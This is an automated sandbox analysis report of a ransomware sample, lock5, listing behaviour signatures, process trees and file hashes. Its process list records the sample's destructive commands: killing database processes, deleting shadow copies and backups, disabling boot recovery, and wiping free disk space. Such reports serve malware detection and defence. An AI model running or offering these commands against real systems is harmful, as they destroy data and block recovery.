Malware Analysis Report

2024-12-07 09:56

Sample ID 241114-knxmvazmen
Target lock5.rar
SHA256 d9a3697fa898a224f3111f86a1c2d3f37cf3bfd555c5a7e8900c7dda6f1f7d9b
Tags
defense_evasion discovery evasion execution impact persistence ransomware
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

d9a3697fa898a224f3111f86a1c2d3f37cf3bfd555c5a7e8900c7dda6f1f7d9b

Threat Level: Known bad

The file lock5.rar was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery evasion execution impact persistence ransomware

Suspicious use of NtCreateUserProcessOtherParentProcess

Modifies boot configuration data using bcdedit

Renames multiple (228) files with added filename extension

Deletes shadow copies

Deletes system backups

Loads dropped DLL

Executes dropped EXE

Enumerates connected drives

Adds Run key to start application

Drops file in Windows directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Interacts with shadow copies

Runs net.exe

Uses Volume Shadow Copy service COM API

Suspicious use of AdjustPrivilegeToken

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-14 08:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-14 08:45

Reported

2024-11-14 08:48

Platform

win7-20240903-en

Max time kernel

149s

Max time network

120s

Command Line

C:\Windows\Explorer.EXE

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2752 created 1216 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\Explorer.EXE

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (228) files with added filename extension

ransomware

Deletes system backups

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\BabyLockerKZ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\7zO428A56F6\\lock5.exe\"" C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\cipher.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\cipher.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl C:\Windows\system32\wbadmin.exe N/A
File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl C:\Windows\system32\wbadmin.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2084 wrote to memory of 2752 N/A C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe
PID 2752 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2768 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2752 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2684 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2684 wrote to memory of 2852 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2752 wrote to memory of 2724 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2724 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2616 wrote to memory of 2844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2752 wrote to memory of 2556 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2556 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2612 wrote to memory of 2632 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2752 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 3052 wrote to memory of 3064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 1260 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2752 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 1444 wrote to memory of 320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 320 wrote to memory of 2796 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\lock5.rar"

C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe

"C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe"

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlbrowser.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sql writer.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlserv.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im msmdsrv.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im MsDtsSrvr.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlceip.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im fdlauncher.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im Ssms.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE

C:\Windows\system32\taskkill.exe

taskkill -f -im SQLAGENT.EXE

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im fdhost.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im ReportingServicesService.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im msftesql.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im pg_ctl.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe

C:\Windows\system32\taskkill.exe

taskkill -f -impostgres.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100

C:\Windows\system32\net.exe

net stop MSSQLServerADHelper100

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper100

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS

C:\Windows\system32\net.exe

net stop MSSQL$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQL$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW

C:\Windows\system32\net.exe

net stop MSSQL$MSFW

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQL$MSFW

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS

C:\Windows\system32\net.exe

net stop SQLAgent$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLAgent$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW

C:\Windows\system32\net.exe

net stop SQLAgent$MSFW

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLAgent$MSFW

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser

C:\Windows\system32\net.exe

net stop SQLBrowser

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLBrowser

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS

C:\Windows\system32\net.exe

net stop REportServer$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop REportServer$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLWriter

C:\Windows\system32\net.exe

net stop SQLWriter

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLWriter

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe

\\?\C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe -network

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoverynabled No

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\wbadmin.exe

wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Windows\system32\wbadmin.exe

wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\System32\Wbem\WMIC.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c pause

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cipher.exe

cipher /w:\\?\C:

C:\Windows\system32\cipher.exe

cipher /w:\\?\A:

C:\Windows\system32\cipher.exe

cipher /w:\\?\F:

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\7zO428A56F6\lock5.exe

MD5 c87d10e375e6fec1c20dfa6da0efaeb0
SHA1 1dc5f1616b4783ac56128c9b6cae9476c4b9f09a
SHA256 10916ae59a8f99306f1af033bb5e97df353e36be9eeaf41264a9146e56f9197e
SHA512 a1adf4f8a4b33e1c1c4db1db42e4052ce07ea958e43d56553a200671888fccb8ed4777efa120f79950ec9eae42734d74c64062b1eccf57b06d4e7da04b84c4ee

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-14 08:45

Reported

2024-11-14 08:48

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

149s

Command Line

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\lock5.rar"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Processes

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\lock5.rar"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 134.130.81.91.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 107.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 22.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

N/A